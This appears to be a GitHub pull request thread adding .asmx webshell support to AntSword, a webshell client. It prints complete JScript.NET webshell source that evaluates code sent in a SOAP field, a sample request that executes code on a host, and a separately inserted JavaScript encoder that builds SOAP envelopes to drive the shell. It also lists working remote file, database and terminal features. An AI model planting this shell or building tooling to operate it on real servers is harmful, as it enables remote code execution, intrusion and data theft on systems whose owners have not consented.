
Shell support for the asmx suffix added. #340

Open. Wants to merge 1 commit into base: master.
Conversation

@ba0gu0 ba0gu0 commented Sep 7, 2023

Add shell support for the asmx suffix.

Because an asmx shell transfers data in XML format, and AntSword currently only supports the standard POST request for ASP-type shells (custom formats are not supported, and an encoder cannot achieve this either), this tries to implement the XML request for asmx shells directly at the low level.

Shell

<%@ WebService Language="JScript" class="asmxWebMethodSpy"%>
import System;
import System.Text;
import System.Web;
import System.IO;
import System.Web.Services;

// ASP.NET web service whose single web method evaluates the string it
// receives as JScript.NET. The SOAP parameter name "Ivan" is therefore the
// element the client must populate in the request body.
public class asmxWebMethodSpy extends WebService
{
    WebMethodAttribute function Invoke(Ivan: String) : Void
    {
        var I = HttpContext.Current;
        var Request = I.Request;
        var Response = I.Response;
        var Server = I.Server;
        Response.Write("<H1>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></H1>");
        // The Request/Response/Server locals above are in scope for the evaluated code.
        eval(Ivan);
    }
}

Shell request

  • When connecting, this shell requires the request to be sent in XML format
POST /2.asmx HTTP/1.1
Host: 172.16.12.73
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/21.0.1
Content-Type: text/xml; charset=utf-8
Content-Length: 350
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <Invoke xmlns="http://tempuri.org/">
            <Ivan>Response.Write("Hello Word !");Response.End();</Ivan>
        </Invoke>
    </soap:Body>
</soap:Envelope>

Implemented features

  • Adding from the home page: works.
  • File management: upload, download, create, delete, edit, rename: works.
  • Database management: Access and MSSQL: works.
  • Virtual terminal: works.

Test results

  1. Adding (screenshot)
  2. Virtual terminal (screenshot)
  3. File management (screenshots)
  4. Database management (screenshots)

END

@Medicean Medicean added the 💪enhancement (feature enhancement) label Sep 15, 2023

@Medicean (Collaborator)

@ba0gu0 Thanks for the PR. Having looked at the payload, it would be more general to change the new type to ASPXRAW and make asmx an encoder.

For example, if in future some shell receives JSON format, adding an encoder would be enough to meet the need.
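The SOAP framing that the PR description says AntSword's ASP request path cannot produce, and that the maintainer proposes to move into an encoder on top of a raw-body type, as an added example that is not code from this PR, from commit b088f1c or from AntSword itself. The method name `Invoke`, the parameter `Ivan` and the `http://tempuri.org/` namespace come from the shell and request shown above; the function names, the `ext` option object and the returned `{ body, headers }` shape are assumptions, not AntSword's actual encoder interface. The one thing the hand-written request above does not show is escaping: any payload containing `<`, `>` or `&` (a comparison, a generic type, an HTML tag) would break the envelope unless escaped as XML text.

```javascript
// Added example: SOAP/XML framing for an .asmx web-method shell.
// Not code from this PR or from AntSword; function names and the encoder-like
// `ext` interface are assumptions, not AntSword's real encoder API.

// Escape the characters that are special in XML text content. Quotes are legal
// inside element text, so they are left alone, which keeps the output identical
// to the request written by hand in the PR description.
function escapeXml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Build the SOAP 1.1 envelope an ASP.NET .asmx service expects for a call to
// `method` with a single string parameter `param`. The namespace defaults to
// http://tempuri.org/, which ASP.NET assigns to services that set none.
function buildSoapEnvelope(method, param, code, ns = 'http://tempuri.org/') {
  return [
    '<?xml version="1.0" encoding="utf-8"?>',
    '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"',
    '    xmlns:xsd="http://www.w3.org/2001/XMLSchema"',
    '    xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">',
    '    <soap:Body>',
    `        <${method} xmlns="${ns}">`,
    `            <${param}>${escapeXml(code)}</${param}>`,
    `        </${method}>`,
    '    </soap:Body>',
    '</soap:Envelope>',
  ].join('\n');
}

// Encoder-shaped wrapper (assumed interface): takes the payload text plus
// optional overrides and returns the raw body and headers a raw-body request
// type would send. SOAPAction is what ASP.NET's default SOAP 1.1 routing uses
// to select the web method, so it is included rather than relying on the
// request element name alone.
function asmxEncode(code, ext = {}) {
  const method = ext.method || 'Invoke';
  const param = ext.param || 'Ivan';
  const ns = ext.ns || 'http://tempuri.org/';
  const body = buildSoapEnvelope(method, param, code, ns);
  return {
    body,
    headers: {
      'Content-Type': 'text/xml; charset=utf-8',
      'SOAPAction': `"${ns}${method}"`,
      'Content-Length': String(Buffer.byteLength(body, 'utf8')),
    },
  };
}

// Decoder-side companion (assumption about server behaviour): if the evaluated
// code does not call Response.End(), ASP.NET appends its own SOAP reply after
// whatever the code wrote. Cut the response at the first XML declaration so
// only the shell's output remains; with Response.End() there is nothing to cut.
function stripSoapResponse(text) {
  const i = text.indexOf('<?xml');
  return i >= 0 ? text.slice(0, i) : text;
}

// Constructed sample, matching the request in the PR description.
const sample = asmxEncode('Response.Write("Hello Word !");Response.End();');
console.log(sample.headers);
console.log(sample.body);

module.exports = { escapeXml, buildSoapEnvelope, asmxEncode, stripSoapResponse };
```

Run with `node` to print the headers and body for the sample payload; the body reproduces the `<Invoke>`/`<Ivan>` element structure of the request above, and a payload such as `if (1<2) ...` comes out as `1&lt;2` instead of breaking the XML.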

@yzddmr6 (Member) commented Sep 15, 2023

Done, implemented via the encoder approach: b088f1c
